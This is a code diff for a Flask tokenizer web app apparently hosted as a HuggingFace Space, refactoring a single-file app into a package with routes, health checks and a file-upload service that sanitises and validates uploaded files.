- fetchTokenizerInfo($('#modelSelect').val(), false);
1698
- } else if ($('#customModelInput').val()) {
1699
- fetchTokenizerInfo($('#customModelInput').val(), true);
1700
- }
1701
-
1702
- // Add event listener for custom model input
1703
- $('#customModelInput').on('change', function() {
1704
- const modelValue = $(this).val();
1705
- if (modelValue) {
1706
- fetchTokenizerInfo(modelValue, true);
1707
- }
1708
- });
1709
- });
1710
- </script>
1711
- </body>
1712
- </html>
1713
- """
1714
-
1715
- @app.route('/tokenizer-info', methods=['GET'])
1716
- def tokenizer_info():
1717
- """
1718
- Endpoint to get tokenizer information without processing text.
1719
- """
1720
- model_id = request.args.get('model_id', '')
1721
- is_custom = request.args.get('is_custom', 'false').lower() == 'true'
1722
-
1723
- if not model_id:
1724
- return jsonify({"error": "No model ID provided"}), 400
1725
-
1726
- try:
1727
- # For predefined models, use the model name from the dictionary
1728
- if not is_custom and model_id in TOKENIZER_MODELS:
1729
- model_id_or_name = model_id
1730
- else:
1731
- # For custom models, use the model ID directly
1732
- model_id_or_name = model_id
1733
-
1734
- # Load the tokenizer and get info
1735
- tokenizer, info, error = load_tokenizer(model_id_or_name)
1736
-
1737
- if error:
1738
- return jsonify({"error": error}), 400
1739
-
1740
- return jsonify(info)
1741
- except Exception as e:
1742
- return jsonify({"error": f"Failed to get tokenizer info: {str(e)}"}), 500
1743
-
1744
- @app.route('/', methods=['GET', 'POST'])
1745
- def index():
1746
- text = ""
1747
- token_data = None
1748
- error_message = ""
1749
- selected_model = request.args.get('model', request.form.get('model', 'qwen3'))
1750
- custom_model = request.args.get('custom_model', request.form.get('custom_model', ''))
1751
- model_type = request.args.get('model_type', request.form.get('model_type', 'predefined'))
1752
-
1753
- # Determine which model to use based on model_type
1754
- model_to_use = selected_model if model_type == 'predefined' else custom_model
1755
-
1756
- if request.method == 'POST':
1757
- # Check if file upload
1758
- if 'file' in request.files and request.files['file'].filename:
1759
- uploaded_file = request.files['file']
1760
- # Save file to tmp directory
1761
- file_path = os.path.join(app.config['UPLOAD_FOLDER'], uploaded_file.filename)
1762
- uploaded_file.save(file_path)
1763
-
1764
- # Read a small preview of the file
1765
- with open(file_path, 'r', errors='replace') as f:
1766
- text = f.read(8096)
1767
-
1768
- try:
1769
- # Process the file
1770
- token_data = process_text("", model_to_use, is_full_file=True, file_path=file_path)
1771
-
1772
- # Clean up the file after processing
1773
- if os.path.exists(file_path):
1774
- os.remove(file_path)
1775
-
1776
- # If request is AJAX, return JSON
1777
- if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
1778
- return jsonify(token_data)
1779
-
1780
- except Exception as e:
1781
- error_message = str(e)
1782
- # Clean up the file after processing
1783
- if os.path.exists(file_path):
1784
- os.remove(file_path)
1785
-
1786
- if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
1787
- return jsonify({"error": error_message}), 400
1788
- return render_template_string(
1789
- HTML_TEMPLATE,
1790
- text=text,
1791
- token_data=None,
1792
- models=TOKENIZER_MODELS,
1793
- selected_model=selected_model,
1794
- custom_model=custom_model,
1795
- model_type=model_type,
1796
- error=error_message
1797
- )
1798
-
1799
- # Regular text processing
1800
- else:
1801
- text = request.form.get('text', '')
1802
- if text:
1803
- try:
1804
- token_data = process_text(text, model_to_use)
1805
-
1806
- # If request is AJAX, return JSON
1807
- if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
1808
- return jsonify(token_data)
1809
-
1810
- except Exception as e:
1811
- error_message = str(e)
1812
- if request.headers.get('X-Requested-With') == 'XMLHttpRequest':
1813
- return jsonify({"error": error_message}), 400
1814
- return render_template_string(
1815
- HTML_TEMPLATE,
1816
- text=text,
1817
- token_data=None,
1818
- models=TOKENIZER_MODELS,
1819
- selected_model=selected_model,
1820
- custom_model=custom_model,
1821
- model_type=model_type,
1822
- error=error_message
1823
- )
1824
-
1825
- return render_template_string(
1826
- HTML_TEMPLATE,
1827
- text=text,
1828
- token_data=token_data,
1829
- models=TOKENIZER_MODELS,
1830
- selected_model=selected_model,
1831
- custom_model=custom_model,
1832
- model_type=model_type,
1833
- error=error_message
1834
- )
1835
-
1836
- if __name__ == "__main__":
1837
- app.run(host='0.0.0.0', port=7860, debug=False)
 
1
#!/usr/bin/env python3
"""
Tokenizer Pro - HuggingFace Space Launcher

HuggingFace Spaces expects an ``app.py`` entry point; this module builds
the Flask application from the restructured app/ package and runs it.
"""

import os

from app import create_app
from config import Config, DevelopmentConfig, ProductionConfig

# FLASK_ENV value -> configuration class; anything unrecognized falls
# back to the base Config.
_CONFIG_BY_ENV = {
    'production': ProductionConfig,
    'development': DevelopmentConfig,
}


def get_config_class():
    """Determine which configuration class to use based on environment."""
    env = os.getenv('FLASK_ENV', 'development').lower()
    return _CONFIG_BY_ENV.get(env, Config)


# Create the Flask application using the app factory
app = create_app(get_config_class())

if __name__ == "__main__":
    # Runtime settings come from the environment so the container can
    # override them without code changes.
    host = os.getenv('HOST', '0.0.0.0')
    port = int(os.getenv('PORT', 7860))
    debug = os.getenv('DEBUG', 'False').lower() in ('true', '1', 'yes')

    app.run(host=host, port=port, debug=debug)
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
app/__init__.py ADDED
@@ -0,0 +1,49 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
import os
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask
from config import Config


def create_app(config_class=Config):
    """Create and configure a Flask application (application-factory pattern).

    Args:
        config_class: Object passed to ``app.config.from_object``;
            defaults to the base ``Config``.

    Returns:
        The configured :class:`flask.Flask` instance with the main
        blueprint registered and, outside debug/testing, rotating file
        logging enabled.
    """
    app = Flask(__name__)
    app.config.from_object(config_class)

    # exist_ok=True avoids the check-then-create race of the previous
    # os.path.exists()/os.makedirs() pair (e.g. two workers starting at
    # once) while behaving identically when the directory already exists.
    os.makedirs(app.config['UPLOAD_FOLDER'], exist_ok=True)
    os.makedirs(app.config['HF_HOME'], exist_ok=True)

    # Point HuggingFace libraries at the writable cache location.
    os.environ['HF_HOME'] = app.config['HF_HOME']
    if 'HF_CACHE_DIR' in app.config:
        os.environ['HF_CACHE_DIR'] = app.config['HF_CACHE_DIR']

    # Register Blueprints (imported here rather than at module top to
    # avoid a circular import with app.routes).
    from app.routes import main_bp
    app.register_blueprint(main_bp)

    # File logging is only wanted for real deployments.
    if not app.debug and not app.testing:
        os.makedirs('logs', exist_ok=True)

        file_handler = RotatingFileHandler(
            f'logs/{app.config.get("LOG_FILE", "tokenizer_pro.log")}',
            maxBytes=app.config.get("LOG_MAX_BYTES", 10 * 1024 * 1024),
            backupCount=app.config.get("LOG_BACKUP_COUNT", 3)
        )
        file_handler.setFormatter(logging.Formatter(
            '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'
        ))

        log_level = getattr(logging, app.config.get("LOG_LEVEL", "INFO").upper())
        file_handler.setLevel(log_level)
        app.logger.addHandler(file_handler)
        app.logger.setLevel(log_level)
        app.logger.info('Tokenizer Pro startup')

    return app
app/routes.py ADDED
@@ -0,0 +1,354 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ from flask import Blueprint, request, render_template, jsonify, current_app
3
+
4
+ # Import services
5
+ from .services.tokenizer_service import tokenizer_service
6
+ from .services.file_service import file_service
7
+ from .utils.validators import validators, ValidationError
8
+
9
+ # Create Blueprint
10
+ main_bp = Blueprint('main', __name__)
11
+
12
+
13
@main_bp.route('/tokenizer-info', methods=['GET'])
def tokenizer_info():
    """Return metadata about a tokenizer without processing any text.

    Query params:
        model_id: Predefined model key or a custom HF model path.
        is_custom: 'true' when model_id is user-supplied and must be
            validated before loading.

    Returns JSON tokenizer info on success, or {"error": ...} with 400
    (bad input / load failure) or 500 (unexpected failure).
    """
    model_id = request.args.get('model_id', '')
    is_custom = request.args.get('is_custom', 'false').lower() == 'true'

    if not model_id:
        return jsonify({"error": "No model ID provided"}), 400

    try:
        # Custom model paths come from user input, so validate them first.
        if is_custom:
            try:
                validators.validate_model_path(model_id)
            except ValidationError as e:
                return jsonify({"error": str(e)}), 400

        # load_tokenizer resolves both predefined keys and custom paths,
        # so the identifier is passed straight through (the previous
        # if/else here assigned the same value on both branches).
        tokenizer, info, error = tokenizer_service.load_tokenizer(model_id)

        if error:
            return jsonify({"error": error}), 400

        return jsonify(info)
    except Exception as e:
        return jsonify({"error": f"Failed to get tokenizer info: {str(e)}"}), 500
46
+
47
def _wants_json():
    """True when the request came from the AJAX frontend."""
    return request.headers.get('X-Requested-With') == 'XMLHttpRequest'


def _render_index(text, token_data, selected_model, custom_model, model_type, error_message):
    """Render the main page with the standard template context."""
    return render_template(
        'index.html',
        text=text,
        token_data=token_data,
        models=tokenizer_service.TOKENIZER_MODELS,
        selected_model=selected_model,
        custom_model=custom_model,
        model_type=model_type,
        error=error_message
    )


@main_bp.route('/', methods=['GET', 'POST'])
def index():
    """Main page: tokenize pasted text or an uploaded file.

    GET renders the empty form.  POST processes either an uploaded file
    (the 'file' field) or pasted text (the 'text' field) with the
    selected tokenizer.  AJAX requests receive JSON; regular requests
    get the rendered page.  Errors are reported as {"error": ...} with
    status 400 (AJAX) or via the template's error slot.
    """
    text = ""
    token_data = None
    error_message = ""
    selected_model = request.args.get('model', request.form.get('model', 'qwen3'))
    custom_model = request.args.get('custom_model', request.form.get('custom_model', ''))
    model_type = request.args.get('model_type', request.form.get('model_type', 'predefined'))

    # The identifier actually handed to the tokenizer service.
    model_to_use = selected_model if model_type == 'predefined' else custom_model

    if request.method == 'POST':
        # File-upload branch.
        if 'file' in request.files and request.files['file'].filename:
            uploaded_file = request.files['file']

            try:
                # Reject unsafe names/extensions before touching the disk.
                validators.validate_filename(uploaded_file.filename)
                validators.validate_file_extension(uploaded_file.filename, file_service.ALLOWED_EXTENSIONS)

                if model_type == 'custom' and custom_model:
                    validators.validate_model_path(custom_model)

                file_path = file_service.save_uploaded_file(uploaded_file, current_app.config['UPLOAD_FOLDER'])

                # Keep a short preview of the file for the form textarea.
                preview_char_limit = current_app.config.get('PREVIEW_CHAR_LIMIT', 8096)
                with open(file_path, 'r', errors='replace') as f:
                    text = f.read(preview_char_limit)

                try:
                    token_data = file_service.process_file_for_tokenization(
                        file_path=file_path,
                        model_id_or_name=model_to_use,
                        preview_char_limit=preview_char_limit,
                        max_display_tokens=current_app.config.get('MAX_DISPLAY_TOKENS', 50000),
                        chunk_size=current_app.config.get('CHUNK_SIZE', 1024 * 1024)
                    )

                    # Remove the temp file whether or not the client is AJAX.
                    file_service.cleanup_file(file_path)

                    if _wants_json():
                        return jsonify(token_data)

                except Exception as e:
                    error_message = str(e)
                    file_service.cleanup_file(file_path)

                    if _wants_json():
                        return jsonify({"error": error_message}), 400
                    return _render_index(text, None, selected_model, custom_model, model_type, error_message)

            except ValidationError as e:
                error_message = str(e)
                if _wants_json():
                    return jsonify({"error": error_message}), 400
                # Validation failed before a preview existed, so render empty text.
                return _render_index("", None, selected_model, custom_model, model_type, error_message)

        # Plain-text branch.
        else:
            text = request.form.get('text', '')
            if text:
                try:
                    validators.validate_text_input(text)

                    if model_type == 'custom' and custom_model:
                        validators.validate_model_path(custom_model)

                    token_data = file_service.process_text_for_tokenization(
                        text=text,
                        model_id_or_name=model_to_use,
                        preview_char_limit=current_app.config.get('PREVIEW_CHAR_LIMIT', 8096),
                        max_display_tokens=current_app.config.get('MAX_DISPLAY_TOKENS', 50000)
                    )

                    if _wants_json():
                        return jsonify(token_data)

                except ValidationError as e:
                    error_message = str(e)
                    if _wants_json():
                        return jsonify({"error": error_message}), 400
                    return _render_index(text, None, selected_model, custom_model, model_type, error_message)
                except Exception as e:
                    error_message = str(e)
                    if _wants_json():
                        return jsonify({"error": error_message}), 400
                    return _render_index(text, None, selected_model, custom_model, model_type, error_message)

    # GET, successful non-AJAX POST, or POST with no input.
    return _render_index(text, token_data, selected_model, custom_model, model_type, error_message)
193
+
194
+
195
@main_bp.route('/health', methods=['GET'])
def health_check():
    """Basic liveness check: return app status and versions as JSON.

    Fix: the previous version imported psutil here without using it, so
    the basic liveness probe would 500 on any host where psutil is not
    installed (the ImportError fired before the try block).
    """
    import time
    from flask import __version__ as flask_version

    try:
        status = {
            "status": "healthy",
            "timestamp": int(time.time()),
            "version": "1.0.0",
            "flask_version": flask_version,
            # NOTE(review): this is just the current timestamp, not a real
            # uptime — kept as-is for response-shape compatibility.
            "uptime": int(time.time()),
        }

        return jsonify(status), 200
    except Exception as e:
        return jsonify({
            "status": "unhealthy",
            "error": str(e),
            "timestamp": int(time.time())
        }), 500
219
+
220
+
221
@main_bp.route('/health/detailed', methods=['GET'])
def detailed_health_check():
    """Detailed health check with system and service status.

    Responds 200 when healthy, 503 when degraded/unhealthy, 500 on an
    unexpected failure while gathering the report.
    """
    import time
    import psutil
    import os
    from flask import __version__ as flask_version

    try:
        # --- System metrics -------------------------------------------------
        cpu_percent = psutil.cpu_percent(interval=1)
        memory = psutil.virtual_memory()
        disk = psutil.disk_usage('/')

        system_info = {
            "cpu_percent": round(cpu_percent, 1),
            "memory": {
                "total": memory.total,
                "available": memory.available,
                "percent": memory.percent,
                "used": memory.used,
            },
            "disk": {
                "total": disk.total,
                "used": disk.used,
                "free": disk.free,
                "percent": round((disk.used / disk.total) * 100, 1),
            },
        }

        # --- Tokenizer service: probe with a small well-known model ---------
        tokenizer_status = "healthy"
        tokenizer_cache_size = len(tokenizer_service.tokenizers) + len(tokenizer_service.custom_tokenizers)
        try:
            test_tokenizer, _, error = tokenizer_service.load_tokenizer('gpt2')
            if error:
                tokenizer_status = f"warning: {error}"
        except Exception as e:
            tokenizer_status = f"error: {str(e)}"

        # --- Upload directory availability ----------------------------------
        upload_folder = current_app.config.get('UPLOAD_FOLDER', '/tmp')
        upload_dir_exists = os.path.exists(upload_folder)
        upload_dir_writable = os.access(upload_folder, os.W_OK) if upload_dir_exists else False

        services_info = {
            "tokenizer_service": {
                "status": tokenizer_status,
                "cached_tokenizers": tokenizer_cache_size,
                "available_models": len(tokenizer_service.TOKENIZER_MODELS),
            },
            "file_service": {
                "upload_directory": upload_folder,
                "directory_exists": upload_dir_exists,
                "directory_writable": upload_dir_writable,
                "allowed_extensions": list(file_service.ALLOWED_EXTENSIONS),
            },
        }

        configuration_info = {
            "max_content_length": current_app.config.get('MAX_CONTENT_LENGTH'),
            "cache_expiration": current_app.config.get('CACHE_EXPIRATION', 3600),
            "max_display_tokens": current_app.config.get('MAX_DISPLAY_TOKENS', 50000),
            "preview_char_limit": current_app.config.get('PREVIEW_CHAR_LIMIT', 8096),
        }

        # A tokenizer error makes the app unhealthy; a tokenizer warning or
        # an unwritable upload directory only degrades it.
        if tokenizer_status.startswith("error"):
            overall_status = "unhealthy"
        elif tokenizer_status.startswith("warning") or not upload_dir_writable:
            overall_status = "degraded"
        else:
            overall_status = "healthy"

        status = {
            "status": overall_status,
            "timestamp": int(time.time()),
            "version": "1.0.0",
            "flask_version": flask_version,
            "system": system_info,
            "services": services_info,
            "configuration": configuration_info,
        }

        return jsonify(status), 200 if overall_status == "healthy" else 503

    except Exception as e:
        return jsonify({
            "status": "unhealthy",
            "error": str(e),
            "timestamp": int(time.time())
        }), 500
310
+
311
+
312
@main_bp.route('/health/ready', methods=['GET'])
def readiness_check():
    """Readiness check - determines if the application is ready to serve requests.

    Bug fix: ``time`` was never imported in this module (the other health
    endpoints import it function-locally, this one did not), so every call
    raised NameError — including inside the except handler, yielding a raw
    500.  Import the locally-needed modules here like the sibling handlers.
    """
    import time
    import os

    try:
        checks = {
            "tokenizer_service": False,
            "file_service": False,
            "configuration": False
        }

        # Tokenizer service must be able to load a small well-known model.
        try:
            test_tokenizer, _, error = tokenizer_service.load_tokenizer('gpt2')
            checks["tokenizer_service"] = error is None
        except Exception:
            checks["tokenizer_service"] = False

        # Upload directory must exist and be writable.
        try:
            upload_folder = current_app.config.get('UPLOAD_FOLDER', '/tmp')
            checks["file_service"] = os.path.exists(upload_folder) and os.access(upload_folder, os.W_OK)
        except Exception:
            checks["file_service"] = False

        # Required configuration keys must be present.
        required_configs = ['MAX_CONTENT_LENGTH', 'UPLOAD_FOLDER']
        checks["configuration"] = all(current_app.config.get(config) is not None for config in required_configs)

        all_ready = all(checks.values())

        return jsonify({
            "ready": all_ready,
            "checks": checks,
            "timestamp": int(time.time())
        }), 200 if all_ready else 503

    except Exception as e:
        return jsonify({
            "ready": False,
            "error": str(e),
            "timestamp": int(time.time())
        }), 500
app/services/__init__.py ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ """
2
+ Service layer for Tokenizer Pro
3
+ """
app/services/file_service.py ADDED
@@ -0,0 +1,187 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ File Service - Handles file processing and chunked text analysis
3
+ """
4
+ import os
5
+ import uuid
6
+ from typing import Dict, Any, List, Tuple
7
+ from werkzeug.utils import secure_filename
8
+ from flask import current_app
9
+
10
+ from .tokenizer_service import tokenizer_service
11
+ from .stats_service import stats_service
12
+
13
+
14
class FileService:
    """Service for handling file uploads and processing.

    All methods are static; the module exposes a shared ``file_service``
    instance for convenience.
    """

    # Allowed file extensions for security (lower-case, with leading dot).
    ALLOWED_EXTENSIONS = {'.txt', '.md', '.py', '.js', '.html', '.css', '.json', '.csv', '.log'}

    @staticmethod
    def is_allowed_file(filename: str) -> bool:
        """Return True if *filename* has an allowed extension (case-insensitive)."""
        if not filename:
            return False
        _, ext = os.path.splitext(filename.lower())
        return ext in FileService.ALLOWED_EXTENSIONS

    @staticmethod
    def generate_secure_filename(original_filename: str) -> str:
        """Generate a collision-free, sanitized filename with a UUID prefix.

        An empty original name yields a random ``.txt`` name.
        """
        if not original_filename:
            return f"{uuid.uuid4().hex}.txt"

        # secure_filename strips path separators and unsafe characters;
        # the UUID prefix avoids collisions between identical uploads.
        secure_name = secure_filename(original_filename)
        name, ext = os.path.splitext(secure_name)
        return f"{uuid.uuid4().hex}_{name}{ext}"

    @staticmethod
    def save_uploaded_file(uploaded_file, upload_folder: str) -> str:
        """Save *uploaded_file* into *upload_folder* under a secure name.

        Args:
            uploaded_file: A werkzeug ``FileStorage`` object from the request.
            upload_folder: Destination directory (created if missing).

        Returns:
            str: Path to the saved file.
        """
        os.makedirs(upload_folder, exist_ok=True)

        secure_filename_str = FileService.generate_secure_filename(uploaded_file.filename)
        file_path = os.path.join(upload_folder, secure_filename_str)

        uploaded_file.save(file_path)
        return file_path

    @staticmethod
    def process_file_for_tokenization(
        file_path: str,
        model_id_or_name: str,
        preview_char_limit: int = 8096,
        max_display_tokens: int = 50000,
        chunk_size: int = 1024 * 1024
    ) -> Dict[str, Any]:
        """Tokenize a file, reading it in chunks to bound peak memory.

        Args:
            file_path: Path to the file to process.
            model_id_or_name: Tokenizer model to use.
            preview_char_limit: Character limit for preview display.
            max_display_tokens: Maximum tokens to display.
            chunk_size: Read size (bytes of decoded text) per chunk.

        Returns:
            Dict containing display tokens, stats and tokenizer info.

        Raises:
            Exception: If the tokenizer fails to load.
        """
        tokenizer, tokenizer_info, error = tokenizer_service.load_tokenizer(model_id_or_name)

        if error:
            raise Exception(error)

        # Fix: decode explicitly as UTF-8 instead of the platform/locale
        # default codec, so results are deterministic across hosts;
        # errors='replace' still tolerates malformed bytes.
        with open(file_path, 'r', encoding='utf-8', errors='replace') as f:
            preview_text = f.read(preview_char_limit)

        # Tokenize only the preview for display purposes.
        preview_tokens = tokenizer.tokenize(preview_text)
        display_tokens = preview_tokens[:max_display_tokens]

        # Stats cover the whole file, processed chunk-by-chunk.
        total_tokens = []
        token_set = set()
        total_length = 0

        with open(file_path, 'r', encoding='utf-8', errors='replace') as f:
            while True:
                chunk = f.read(chunk_size)
                if not chunk:
                    break
                total_length += len(chunk)
                chunk_tokens = tokenizer.tokenize(chunk)
                total_tokens.extend(chunk_tokens)
                token_set.update(chunk_tokens)

        # The original text is not kept in memory; a same-length dummy
        # string preserves the compression-ratio calculation.
        stats = stats_service.get_token_stats(total_tokens, ' ' * total_length)

        token_data = stats_service.format_tokens_for_display(display_tokens, tokenizer)

        return {
            'tokens': token_data,
            'stats': stats,
            'display_limit_reached': len(total_tokens) > max_display_tokens,
            'total_tokens': len(total_tokens),
            'is_full_file': True,
            'preview_only': True,
            'tokenizer_info': tokenizer_info
        }

    @staticmethod
    def process_text_for_tokenization(
        text: str,
        model_id_or_name: str,
        is_preview: bool = False,
        preview_char_limit: int = 8096,
        max_display_tokens: int = 50000
